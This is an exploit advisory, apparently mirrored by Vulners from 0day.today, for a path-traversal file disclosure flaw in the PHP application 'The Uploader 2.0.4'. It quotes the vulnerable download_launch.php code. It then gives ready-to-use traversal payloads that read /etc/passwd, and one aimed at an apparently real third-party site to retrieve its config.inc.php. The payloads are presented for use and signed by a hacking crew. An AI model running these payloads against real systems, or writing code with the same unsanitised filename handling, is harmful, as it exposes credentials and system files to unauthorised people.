Lucene search
K

The Uploader 2.0.4 Remote File disclosure Vulnerability

🗓️ 22 Jun 2010 00:00:00Reported by Xa7m3dType 
zdt
 zdt
🔗 0day.today👁 18 Views

The Uploader 2.0.4 Remote File disclosure Vulnerability in ph

Code
=======================================================
The Uploader 2.0.4 Remote File disclosure Vulnerability
=======================================================

# Script Name : The Uploader
# Version: [2.0.4]
# Language : php
# Author : Xa7m3d ([email protected])
# Download : http://sourceforge.net/projects/theuploader
# Tested on : ubuntu 9.10

==============================================

File Disclosure :
in : api/download_launch.php

#######################################
$open=fopen($main['upload_directory'] . $_GET['filename'], "r"); <??(+)
$size=filesize($main['upload_directory'] . $_GET['filename']);
$read=fread($open, $size);
header("Content-Type: application/octet-stream");
header("Content-Length: " . $size);
header("Content-Transfer-Encoding: binary");
header("Content-Disposition: attachment; filename=" . $_GET['filename']); <??(+)
#######################################  

3XP :

api/download_launch.php?filename=../../../../../etc/passwd
 
Example :

http://www.busut.it/theuploader/api/download_launch.php?filename=../config.inc.php


T3AM Piracy Unlimited Tunisia : # Cyb3R H3LL # k[i]ng  # La Haft Xroy #



#  0day.today [2018-01-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Jun 2010 00:00Current
7.1High risk
Vulners AI Score7.1
18